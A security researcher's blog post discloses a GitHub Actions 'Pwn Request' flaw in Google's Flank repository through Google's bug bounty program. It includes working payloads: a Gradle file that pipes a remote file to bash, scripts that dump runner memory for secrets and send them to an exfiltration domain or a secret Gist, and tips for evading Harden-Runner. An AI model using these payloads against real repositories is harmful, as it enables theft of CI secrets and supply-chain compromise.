An Obscure Actions Workflow Vulnerability in Google’s Flank

Introduction

Recently, I reported a “Pwn Request” vulnerability in Google’s Flank repository. Flank is described as a “Massively parallel Android and iOS test runner for Firebase Test Lab” and is an official Google open source project.

The vulnerability allowed anyone with a GitHub Account to steal Google service account credentials which were used as a repository secret along with obtaining access to a GITHUB_TOKEN with write access.

Google’s VRP rewarded me with a $7,500 bug bounty for this report as a Software Supply Chain compromise under the “Standard OSS Project” tier.

Actions Injections and Pwn Request vulnerabilities are far from new, and exploiting them isn’t worthy of blog post at this point, but there are some unique aspects to this particular vulnerability that I think there is value in highlighting.

What is unique about this repository is how long it was vulnerable despite Google operating one of the best bug bounty programs in the industry. Most “textbook” Pwn Requests will be reported within days by bug bounty hunters; however, the vulnerability was introduced on Dec 17th, 2020 in this pull request. This means that for over three years no one identified this vulnerability despite a very high chance at a generous bug bounty payment!

How did I find it? I used an automated tool that I have been developing to discover this vulnerability. In this post I’ll cover how I discovered it, my PoC, the disclosure timeline, and provide some words of wisdom about how I think this bug class can be solved at scale.

Discovery & PoC

Gato-X

While with my previous employer, Praetorian, I led the development of a tool called Gato. The tool focused on self-hosted runners along with post-compromise enumeration and exploitation for GitHub classic personal access tokens.
At the same time, I’ve been doing bug bounty hunting on the side with regular expressions to discover injection and pwn requests vulnerabilities. I always had the feeling that I was missing obscure cases, and I was right.

I started working on adding detection for injection and Pwn requests attacks and adding it to my private fork of the tool. There are already tools for this vulnerability class like Cycode Labs’ Raven and TinderSec’s gh-workflow-auditor, however I have taken a different design approach by approaching the problem from an offensive perspective.

Instead of trying to audit workflows or generate actionable findings, my goal was to scan workflows that run on risky triggers at scale, and then work backwards from that to identify true positives:

Take 20 or 30 thousand repositories at a time and identify candidates for further review. I used sourcegraph.com/search for this.
False positives are ok, but provide context to quickly determine if something is interesting or not within a few seconds.
Avoid false negatives as much as possible.

Currently, the tool will take 20-30 thousand repositories and report roughly 2000 candidates. In the tool’s current state, roughly 70 percent are false positives. However, for the majority of false positives I can tell just by looking at the result. The best part? Gato-X performs this scan in only a few hours running on a laptop with a single GitHub Account.

Below is the output Gato-X presented for Flank. Right off the bat, I can tell that:

The workflow ran on issue_comment (which includes comments on pull requests)
It referenced a pull request number by context expression within a run step that is called “Checkout Pull Request”

Just by seeing this output I knew it was worth investigating. Gato-X also provided a direct link to the HTML workflow, so I could click on it and investigate further.

                "pwn_request_risk": [],
                "injection_risk": [
                    {
                        "workflow_name": "run_integration_tests.yml",
                        "workflow_url": "https://github.com/Flank/flank/blob/master/.github/workflows/run_integration_tests.yml",
                        "details": {
                            "triggers": [
                                "issue_comment"
                            ],
                            "should_run_it": {
                                "Check if integrations tests should run": {
                                    "variables": [
                                        "env.run_it",
                                        "steps.check_issue_comment.outputs.triggered == 'true'"
                                    ]
                                }
                            },
                            "run-it-full-suite": {
                                "Checkout Pull Request": {
                                    "variables": [
                                        "needs.should_run_it.outputs.pr_number"
                                    ],
                                    "if_checks": "github.event_name == 'issue_comment'"
                                },
                                "if_check": "needs.should_run_it.outputs.run_integration_tests == 'true'"
                            },
                            "process-results": {
                                "Process IT results": {
                                    "variables": [
                                        "needs.run-it-full-suite.outputs.job_status"
                                    ]
                                },
                                "if_check": "always() && github.event_name != 'issue_comment'"
                            }
                        }
                    }
                ]
            },

You may notice that when Gato-X picked up the repository, it did not detect this as a Pwn Request, as the pwn_request_risk field is empty. This was because at the time, Gato-X did not have a specific detection for checking out the PR via the gh cli, but the context surrounding the use of the pr_number was enough to determine this repository was worth investigating.

Peculiar Checkout

What made this vulnerability unique is probably also why no one found it before. The workflow ran on issue_comment, but did not actually reference context variables typically called out in resources on Actions injection vulnerabilities.

First, the workflow retrieves the pull request’s HTML URL. Next, it parsed out the PR number from the HTML URL. Finally, it set that as the output value for the step.

   - name: Get PR number
        id: pr_number
        if: ${{ github.event_name == 'issue_comment'}}
        run: |
          PR_URL="${{ github.event.issue.pull_request.url }}"
          PR_NUMBER=${PR_URL##*/}
          echo "number=$PR_NUMBER" >> $GITHUB_OUTPUT

The subsequent step used the PR number from the previous step’s output and passed it via context expression to a run step including gh pr checkout.

    - name: Checkout Pull Request
        if: github.event_name == 'issue_comment'
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          gh pr checkout ${{ needs.should_run_it.outputs.pr_number }}

This highlights the importance of source-to-sink analysis when reviewing GitHub Actions workflows for vulnerabilities.

After the checkout, the workflow eventually ran integration tests which I was able to modify to prove that I could execute arbitrary code within the context of a privileged workflow.

Gato-X – Coming soon to all!

I hope to open source an alpha version of Gato-X soon. My current goal is to cut down the false positive rates by building an expression tree from each if check and evaluating it in the context of an external actor triggering the event.

I can’t wait to release it, because the combination of the tool’s speed and finding obscure cases makes it possible for security professionals to identify these issues hours at a scale that was not possible before.

Proof of Concept

In order to prove this vulnerability, on February 27th, at 10:45 EST, I created a draft pull request with my payload and was able to prove the vulnerability and access to the application token secret.

I want to give a shout out to Boost Security’s Living off the Pipeline Project. I was able to use an off-the-shelf payload for Gradle as my code injection point. Projects like LoTP make it easier for security researchers to prove vulnerabilities but also give developers a list of files they should be careful to make sure external actors cannot modify if workflows are running on risky triggers.

You can see below how the workflow had access to a secret and then kicked off integration tests using the grade/grade-build-action.

I modified the settings.gradle.kts file within my fork to pull down code from a file and pipe it to bash.

// For VRP Test, not malicious.
fun String.runCommand(): String? = try {
    ProcessBuilder("/bin/sh", "-c", this)
        .redirectOutput(ProcessBuilder.Redirect.PIPE)
        .redirectError(ProcessBuilder.Redirect.PIPE)
        .start()
        .inputStream.bufferedReader().readText()
} catch (e: Exception) {
    e.printStackTrace()
    null
}

val output = "curl -sSfL https://github.com/Flank/flank/raw/88e5a56dd3ed78f4f192eadf31634c013dbbf060/README | bash".runCommand()
println("Shell command output: $output")

This payload allowed me to obtain access to a GITHUB_TOKEN with write access and the application secret. Once I prepared the payload, I created a draft pull request and commented @flank-it . This triggered execution of the workflow in the context of the main branch.

Shortly after, I received the secrets in the form of a Gist.

Detection by Harden-Runner

If you looked at my payload, you probably noticed that I was downloading a raw file from the base repository called README. Normally, I would just host the following payload in a Gist and pipe it to Bash, like so:

# Replace with Burp collaborator domain or similar.
YOUR_EXFIL="your-exfil-domain.com"

# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
if [[ "$OSTYPE" == "linux-gnu" ]]; then
  B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
  # Exfil to Burp
  curl -s -d "$B64_BLOB" https://$YOUR_EXFIL/token > /dev/null
else
  exit 0
fi

For Flank, I employed some creativity here because I noticed that the workflow was using StepSecurity’s Harden-Runner in audit mode. Since harden runner was in audit more, I didn’t have to be sneaky to prove the vulnerability, but I wanted to see if I could get around the detection as an exercise.

Commit in Network of Forks

I committed two files to my fork. The first was a Bash script, and the other was a copy of Nikita Stupin’s excellent memory dumping script which I’ve used extensively over the past few months.

In GitHub, any commit in a fork is also within the base repository. This means you can access the same commit hash from the fork repository or the base. This is why my payload referenced a file from the base repository.

val output = "curl -sSfL https://github.com/Flank/flank/raw/88e5a56dd3ed78f4f192eadf31634c013dbbf060/README | bash".runCommand()
println("Shell command output: $output")

Exfiltrate to Secret Gist

Since Harden Runner picks up requests to anomalous URLs, instead of simply exfiltrating the encoded blob to Burp, I used the GitHub API along with a fine-grained PAT (which I quickly revoked after the PoC) to upload the GCloud application token and GITHUB_TOKEN to a secret Gist.

if [[ "$OSTYPE" == "linux-gnu" ]]; then
  B64_BLOB=`curl -sSfL https://github.com/flank/flank/raw/128b43b61fd7da13ea6829d1fbb4d3f028b6cdad/LICENSE | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0`
  YEETER_TOKEN="<EXFIL TOKEN>"
  YEETER_TOKEN_DECODED=`echo $YEETER_TOKEN | base64 -d | base64 -d`

  curl -L \
    -X POST \
    -H "Accept: application/vnd.github+json" \
    -H "Authorization: Bearer $YEETER_TOKEN_DECODED" \
    -H "X-GitHub-Api-Version: 2022-11-28" \
    https://api.github.com/gists -d '{"public":false,"files":{"Spoils":{"content":"'$B64_BLOB'"}}}'

    sleep 900
else
  exit 0
fi

This exfiltration method is very useful for exploiting actions vulnerabilities because all traffic goes to GitHub. It’s even more useful on self-hosted runners where the runner is in an environment that might have strong egress controls.

Did it work?

Harden-Runner actually did detect one anomalous request during my PoC, which was impressive. I had thought that using a commit from the base repository would have masked the behavior, but the issue was that the call to raw.githubusercontent itself was anomalous within that workflow as seen on the insights page. Had harden-runner been in block mode, it would have blocked the initial download of the payload and I would have had to scramble to update it to use a different method or just hardcode the full payload in the pull request.

This is important! In a real-world supply chain attack scenario, alerting on the attacker’s first exploit attempt can place security teams on notice, so even if the attacker re-exploited and successfully captured the application token, a security team can contain the attacker by revoking secrets and temporarily disabling Actions while they assess the breach. Supply chain attacks are unique in that they are usually delayed fuse attacks, if a security team can catch an attacker in the act, then it is unlikely the attacker would be able to cause any long-term damage.

In hindsight, I should have used GitHub’s API to download the commit using the API, parsed the content Base64 blob from the JSON response, and then piped that into Bash, this would have avoided the anomalous event. I could have gone even further to use Java to do it, because then both the destination and the URL would match the baseline.

No defensive product can prevent every single exfiltration or attack vector, but I was definitely impressed with Harden Runner as a security solution for GitHub Actions workflows.

Right now, if an attacker gets inside a workflow execution via a Pwn Request or supply chain attack on an upstream dependency, or even Actions cache poisoning (stay tuned – I’ve got a lot more on that coming soon), then there isn’t anything there to detect or stop them.

Disclosure Timeline

February 27th, 2024 – Report sent to Google VRP
February 28th, 2024 – Report Accepted
March 5th, 2024 – Awarded $7,500 Bounty
March 11th, 2024 – Workflow fixed by Google in https://github.com/Flank/flank/pull/2482
April 3rd, 2024 – Informed Google of plans to publish blog post mid-April and shared draft. Received word that I am good to publish.
April 15th, 2024 – Blog published.

As always, I had a very good experience reporting this bug to Google’s VRP.

References

https://boostsecurityio.github.io/lotp/ – Boost Security’s Living off the Pipeline Project
https://github.com/step-security/harden-runner – StepSecurity Harden Runner
https://github.com/nikitastupin/pwnhub – Nikita Stupin’s Pwnhub Repository

Adnan Khan's Blog